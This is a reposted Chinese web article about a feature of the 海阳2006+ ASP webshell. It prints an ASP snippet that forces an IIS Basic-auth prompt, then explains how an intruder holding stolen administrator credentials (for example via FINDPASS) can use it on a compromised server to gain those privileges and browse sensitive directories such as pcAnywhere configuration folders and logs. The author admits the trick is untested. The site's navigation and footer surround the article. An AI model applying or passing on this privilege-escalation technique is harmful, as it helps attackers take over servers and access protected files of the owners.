• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    海阳2006+功能中的潜水王
    ps:我还没测试。
    信息来源:H4×0r's Blog

    复制代码 代码如下:

    bOtherUser = False ''是否需要其它NT用户身份登录 

    If bOtherUser = True And Trim(Request.ServerVariables("AUTH_USER")) = "" Then 
    Response.Status = "401 Unauthorized" 
    Response.Addheader "WWW-AuThenticate", "BASIC" 
    If Request.ServerVariables("AUTH_USER") = "" Then Response.End() 
    End If 


    重点点播
    Response.Status = "401 Unauthorized"只要在代码开头加入这句,IIS就会自动调用登陆窗口啦

    此功能可以调用其它NT用户身份登录
    如果你知道比GUEST权限大的用户的密码什么的话,比如管理员,嘿嘿~你就发达了[例如:通过FINDPASS,或自动登陆获取的]
    比如知道管理员的密码,但是对方没终端,没其他可以提权限的东东,嘿嘿这个东西就可以帮你忙了
    登陆后,获得的权限是相应的登陆用户的权限哦!
    敏感目录:存放CIF的PCANYWHERE、启动等目录
    可以进入该用户拥有权限的所有目录,以及查阅其拥有权限的文件,比如LOG什么的。
    上一篇:ASP javascript Application对象的Contents和StaticObjects做Cache的一些经验
    下一篇:隐藏ASP木马后门的两种方法
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    海阳2006+功能中的潜水王 海阳,2006+,功能,中的,潜水,